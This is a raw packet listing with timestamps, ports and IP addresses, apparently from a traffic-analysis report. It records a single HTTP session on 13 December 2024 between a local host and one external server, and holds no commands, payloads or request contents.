Dec 13, 2024 01:37:36.088661909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088707924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088721037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088756084 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088758945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088792086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088800907 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088807106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088901997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088916063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.088922977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088932037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088938951 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.088953018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089031935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089051008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089068890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089097023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089150906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089173079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089196920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089222908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089258909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089281082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089297056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089324951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089339018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089366913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089380026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089410067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089426994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.089458942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090379953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090414047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090426922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090461016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090476036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090504885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090523958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090548992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090568066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090593100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090605974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090635061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090651989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090677977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090810061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090836048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090850115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090883017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090960026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.090986013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091001034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091031075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091095924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091123104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091136932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091162920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091200113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091232061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091258049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091275930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091301918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091322899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091358900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091372967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091397047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091411114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091438055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091461897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091485977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091500044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091522932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091538906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091792107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091814041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091856956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091875076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091903925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091929913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091948032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091965914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.091993093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092005968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092039108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092055082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092082024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092097044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092253923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092303038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092374086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092396975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092415094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092442989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092504978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092539072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092554092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092617989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092653036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092684984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092709064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092722893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092744112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092758894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092789888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092817068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.092844009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093048096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093075037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093142986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093151093 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093158007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093166113 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093199015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093208075 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093214989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.093645096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093750000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093765020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093790054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093848944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093873978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093887091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093911886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093946934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.093966007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094001055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094043016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094063997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094094992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094116926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094141006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094315052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094362020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094376087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094398975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094413996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094443083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094459057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094486952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094511986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094538927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094563961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094588995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094604015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094629049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094652891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094676018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094705105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094825983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094840050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094861031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094877005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094944000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094979048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.094994068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095083952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095083952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095109940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095124006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095145941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095174074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095199108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095221996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095241070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095258951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095278978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095304966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095326900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095340014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095356941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095381975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095401049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095422029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095437050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095459938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095639944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095664024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095679998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095701933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095716953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095736980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095760107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095774889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095802069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095818996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095839024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095865965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095880032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095899105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095913887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095933914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095953941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.095973015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096066952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096081018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096101999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096120119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096187115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096218109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096235037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096256971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096312046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096335888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096349955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096380949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096410036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096445084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096465111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096479893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096503019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096517086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096548080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096560955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096584082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096607924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096622944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096723080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096745968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096777916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096805096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096820116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096857071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096874952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096899986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096913099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096941948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096966982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.096987963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097001076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097031116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097045898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097076893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097093105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097125053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097208023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097242117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097270966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097289085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097306967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097327948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097342968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097426891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097453117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097467899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097491980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097551107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097577095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097596884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097620964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097696066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097696066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097723961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097738028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097768068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097781897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097809076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097832918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.097856045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098038912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098067999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098088980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098124981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098144054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098161936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098181963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098205090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098231077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098247051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098268032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098282099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098301888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098328114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098341942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098365068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098382950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098409891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098448992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.098975897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099000931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099014044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099123001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099196911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099220037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099247932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099263906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099289894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099450111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099472046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099484921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099519014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099534988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099565983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099580050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099603891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099617958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099642038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099659920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099684954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099699020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099721909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099736929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099764109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099777937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099807978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099824905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099848986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099864960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099890947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.099908113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100032091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100050926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100078106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100092888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100114107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100179911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100213051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100238085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100260973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100320101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100347996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100362062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100394964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100502014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100517035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100543022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100558043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100591898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100608110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100636959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100841999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100871086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100898981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100927114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100940943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100966930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.100982904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.101017952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.101031065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.101058960 CET	49775	80	192.168.2.5	185.81.68.147
